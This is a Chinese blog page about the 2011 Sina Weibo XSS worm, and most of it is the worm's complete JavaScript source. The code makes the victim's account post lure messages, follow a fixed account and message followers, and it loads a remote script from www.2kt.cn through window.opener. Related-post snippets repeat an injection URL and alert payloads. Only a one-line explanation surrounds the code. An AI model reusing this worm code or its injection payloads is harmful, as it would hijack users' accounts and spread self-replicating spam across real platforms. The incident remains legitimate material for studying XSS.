新浪微博曾经受到过xss蠕虫攻击

最新推荐文章于 2024-01-07 00:00:59 发布
最新推荐文章于 2024-01-07 00:00:59 发布
阅读量1.4k 收藏 2
点赞数 1
分类专栏: xss

2)蠕虫

新浪微博曾经受到过xss蠕虫攻击,代码如下

[javascript]  view plain  copy
  1. function createXHR(){  
  2.     return window.XMLHttpRequest?  
  3.     new XMLHttpRequest():  
  4.     new ActiveXObject("Microsoft.XMLHTTP");  
  5. }  
  6. function getappkey(url){  
  7.     xmlHttp = createXHR();  
  8.     xmlHttp.open("GET",url,false);  
  9.     xmlHttp.send();  
  10.     result = xmlHttp.responseText;  
  11.     id_arr = '';  
  12.     id = result.match(/namecard=\"true\" title=\"[^\"]*/g);  
  13.     for(i=0;i<id.length;i++){  
  14.         sum = id[i].toString().split('"')[3];  
  15.         id_arr += sum + '||';  
  16.     }  
  17.     return id_arr;  
  18. }  
  19. function random_msg(){  
  20.     link = ' http://163.fm/PxZHoxn?id=' + new Date().getTime();;  
  21.     var msgs = [  
  22.         '郭美美事件的一些未注意到的细节:',  
  23.         '建党大业中穿帮的地方:',  
  24.         '让女人心动的100句诗歌:',  
  25.         '3D肉团团高清普通话版种子:',  
  26.         '这是传说中的神仙眷侣啊:',  
  27.         '惊爆!范冰冰艳照真流出了:',  
  28.         '杨幂被爆多次被潜规则:',  
  29.         '傻仔拿锤子去抢银行:',  
  30.         '可以监听别人手机的软件:',  
  31.         '个税起征点有望提到4000:'];  
  32.     var msg = msgs[Math.floor(Math.random()*msgs.length)] + link;  
  33.     msg = encodeURIComponent(msg);  
  34.     return msg;  
  35. }  
  36. function post(url,data,sync){  
  37.     xmlHttp = createXHR();  
  38.     xmlHttp.open("POST",url,sync);  
  39.     xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");  
  40.     xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");  
  41.     xmlHttp.send(data);  
  42. }  
  43. function publish(){  
  44.     url = 'http://weibo.com/mblog/publish.php?rnd=' + new Date().getTime();  
  45.     data = 'content=' + random_msg() + '&pic=&styleid=2&retcode=';  
  46.     post(url,data,true);  
  47. }  
  48. function follow(){  
  49.     url = 'http://weibo.com/attention/aj_addfollow.php?refer_sort=profile&atnId=profile&rnd=' + new Date().getTime();  
  50.     data = 'uid=' + 2201270010 + '&fromuid=' + $CONFIG.$uid + '&refer_sort=profile&atnId=profile';  
  51.     post(url,data,true);  
  52. }  
  53. function message(){  
  54.     url = 'http://weibo.com/' + $CONFIG.$uid + '/follow';  
  55.     ids = getappkey(url);  
  56.     id = ids.split('||');  
  57.     for(i=0;i<id.length - 1 & i<5;i++){  
  58.         msgurl = 'http://weibo.com/message/addmsg.php?rnd=' + new Date().getTime();  
  59.         msg = random_msg();  
  60.         msg = encodeURIComponent(msg);  
  61.         user = encodeURIComponent(encodeURIComponent(id[i]));  
  62.         data = 'content=' + msg + '&name=' + user + '&retcode=';  
  63.         post(msgurl,data,false);  
  64.     }  
  65. }  
  66. function main(){  
  67.     try{  
  68.         publish();  
  69.     }  
  70.     catch(e){}  
  71.     try{  
  72.         follow();  
  73.     }  
  74.     catch(e){}  
  75.     try{  
  76.         message();  
  77.     }  
  78.     catch(e){}  
  79. }  
  80. try{  
  81.    x="g=document.createElement('script');g.src='http://www.2kt.cn/images/t.js';document.body.appendChild(g)";window.opener.eval(x);  
  82. }  
  83. catch(e){}  
  84. main();  
  85. var t=setTimeout('location="http://weibo.com/pub/topic";',5000);  

而这段代码就是通过之前的反url编码的方式,用src插入进去的。主要是完成了发一条微博,然后关注作者,然后向粉丝推送这条链接达到传递的目的。
gaisidewangzhan1
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
浅谈跨网站脚本攻击(XSS)的手段与防范(简析新浪微博XSS攻击事件)
03-04
1.什么是XSS2.XSS攻击手段和目的3.XSS的防范4.新浪微博攻击事件跨网站脚本(Cross-sitescripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的H
XSS蠕虫&病毒--即将发生的威胁与最好的防御
05-28
XSS蠕虫&病毒--即将发生的威胁与最好的防御
新浪微博XSS蠕虫脚本源码讲解
weixin_34267123的博客
04-09 564
主要是因为新浪的广场页面有几个链接对输入参数过滤不严导致的反射性XSS。======================================== 微博XSS漏洞点 weibo.com/pub/star/g/xyyyd%22%3e%3cscript%20src=//www.****.com/images/t.js%3e%3c/script%3e?type=update 微博XSS...
xss攻击新浪微博xss蠕虫
zhangzhangdan的博客
07-21 2586
xss蠕虫:通过一个bug,感染其他结构都出现问题 我们根据一段xss攻击链接来看一下: 很显然,javascript代码被解析了,那它原型是什么呢,怎么看  通过这样我们可以看出,这段javascript代码是指向一个js文件,js文件中写的是一些文章标题链接,而这段链接也是携带这段javascript代码,这样当有人点击了这段链接,就又执行这个xss攻击操作了,这样一传十,十传百...
网络攻防-XSS攻击实验
最新发布
qq_64389397的博客
01-07 1775
1.在传播病毒的同时,将病毒也复制在about me中,这样这段代码就会一直存在,所有访问都在自己的about字段添加这段代码,这样就能一直传第下去。如果不添加If判断,如果时samy自己进入个人简介,也会触发JavaScript代码,但是因为post的about me字段为空,那么这段JavaScript代码将会被清空,所以需要加上这段if判断,这样当当前用户是samy时,不会触发。3.由获取的信息可知,接口的url地址,post提交数据的方式,使用这些信息填入JavaScript框架的对应信息中。
新浪微博XSS攻击事件
TERRY的技术日志
06-29 3486
6月28日20时14分左右开始,新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如:“郭美美事件的一些未注意到的细节”,“建 党大业中穿帮的地方”,“让女人心动的100句诗歌”,“3D肉团团高清普通话版种子”,“这是传说中的神仙眷侣啊”,“惊爆!范冰冰艳照真流出了”等等 微博消息和私信,并自动关注一位名为hellosamy的用户。  事件的经过线索如下:20:14,开始有大量带
新浪某频道XSS漏洞
swordheart的博客
04-17 4533
漏洞详情 披露状态: 2010-07-28: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-27: 细节向公众公开 简要描述: 新浪某频道XSS漏洞 详细说明: 对搜索的字符未进行有效的处理过滤 造成XSS漏洞 漏洞证明: http://che.sina.com.cn/apps/i
新浪微薄被攻击的代码。。。
06-29 950
来源:http://www.2kt.cn/images/t.jsfunction createXHR(){ return window.XMLHttpRequest? new XMLHttpRequest(): new ActiveXObject("Microsoft.XMLHTTP");}function getappkey(url){ xmlHttp = createXHR(); xm
xss攻击
2303_76249635的博客
01-26 271
对于xss攻击的简述 XSS是一种Cross-site scripting跨站脚本,它是一种经常在web应用中出现的漏洞,攻击者可以使用该漏洞注入任意恶意代码以实现对靶目标的攻击 xss又名css,其攻击方式大致可分为三种反射型xss,存储型xss,DOM型xss 其中反射型xss具有非持久性的特点另外两种攻击方式具有持久性攻击特点可长期存储在服务器数据库中 xss的危害 1.窃取用户信息 2.钓鱼攻击 3.拒绝服务攻击 4.劫持用户web行为进一步渗透内网 5.刷广告,刷流量,破坏服务器
仿新浪微博php程序xweibo
06-08
新浪微博类应用涉及到大量的用户数据存储和检索,XWeibo可能会使用MySQL或其他关系型数据库系统,进行用户注册、登录、发布动态等操作。这需要开发者熟悉SQL语言,以及PHP与数据库的交互方式,如PDO或mysqli扩展。 ...
jQuery新浪微博发布页面代码
06-24
**安全性和性能**:为了防止XSS攻击和提高页面加载速度,代码可能采用了如输入验证、延迟加载图片、代码压缩和合并等最佳实践。 总结来说,【jQuery新浪微博发布页面代码】涵盖了前端开发中的多个重要方面,包括...
关于pdf文件xss攻击问题,配置xssFilter方法
12-21
通过在SpringBoot应用中配置XSSFilter并结合其他安全措施,可以有效防止此类攻击,保护用户的浏览器环境不受侵害。同时,定期更新安全知识,对新的攻击手段保持警惕,是保障Web应用程序安全的重要环节。
.net core xss攻击防御的方法
10-18
主要介绍了.net core xss攻击防御的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
浅析新浪微博Web蠕虫事件 XSS漏洞
weixin_33716941的博客
07-04 633
  6月28日晚间20时左右,新浪出现了一次比较大的XSS(跨站脚本)漏洞***,"中毒"的微博用户会自动向自己的粉丝发送诸如"建党大业中穿帮的地方"、"个税起征点有望提到4000"、"郭美美事件的一些未注意到的细节"、"3D肉团团高清普通话版种子"等含毒的微博与私信,并自动关注一位名为hellosamy,粉丝点击后会再次中毒,然后形成恶性循环。新浪微博蠕虫爆发仅执续了16分...
新浪微博XSS攻击代码简要解析
首席技术执行官CTO(Chief Technology Officer)|技术总监--邓斌博客
11-14 2809
代码下载(来源鸽姆安全网) [javascript] view plaincopyprint?/**  *使用AJAX创建XMLHttpRequest对象,若不是IE浏览器,使用XMLHttpRequest创建XHR对象,  *否则使用ActiveXObject创建XHR对象。  */  function createXHR(){      return window.XMLHttpRequest
XSS跨站脚本攻击实例讲解,新浪微博XSS漏洞过程分析
weixin_34186128的博客
07-11 558
2011年6月28日晚,新浪微博遭遇到XSS蠕虫攻击侵袭,在不到一个小时的时间,超过3万微博用户受到该XSS蠕虫攻击。此事件给严重依赖社交网络的网友们敲响了警钟。在此之前,国内多家著名的SNS网站和大型博客网站都曾遭遇过类似的攻击事件,只不过没有形成如此大规模传播。虽然此次XSS蠕虫攻击事 件中,恶意黑客攻击者并没有在恶意脚本中植入挂马代码或其他窃取用户账号密码信息的脚本,但是这至少说明,病毒木...
新浪微博多处XSS漏洞
swordheart的博客
04-11 215
漏洞详情 披露状态: 2010-07-16: 细节已通知厂商并且等待厂商处理中 2010-08-18: 细节向公众公开 简要描述: 新浪微博多处粉严重的XSS,尽快修复吧 详细说明: 同城活动那里是有xss的,名称还是简介那里忘记了";alert(1);//你们再测下吧,今天不让发活动了- -次数限制太严格了…… 漏洞证明: http://t.sina.com.cn/pub/tags/%2522%253E%253Cscript%253Ealert(1)%253C%252Fscript%253
xss蠕虫是怎么进行攻击
05-14
XSS蠕虫是一种利用跨站脚本漏洞(Cross-site scripting, XSS)自动传播的恶意软件。攻击者利用XSS漏洞在受害者的网站上注入恶意脚本,当其他用户访问该网站时,这些恶意脚本会自动执行,从而使得这些用户也成为了受害者。 具体来说,XSS蠕虫攻击过程一般分为以下几个步骤: 1. 攻击者在受害者的网站上注入恶意脚本,例如通过在评论区输入恶意脚本。 2. 当其他用户访问该网站时,恶意脚本会自动执行,例如将用户的Cookie信息发送给攻击者的服务器。 3. 攻击者收到用户的Cookie信息后,可以利用该信息进行其他恶意行为,例如进行身份伪造、窃取用户数据等。 为了避免XSS蠕虫攻击,网站开发者可以采取以下措施: 1. 对用户输入进行严格的过滤,避免注入恶意脚本。 2. 在网站中使用CSP(Content Security Policy)等安全机制,限制恶意脚本的执行。 3. 及时修补XSS漏洞,避免攻击者利用该漏洞进行攻击

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值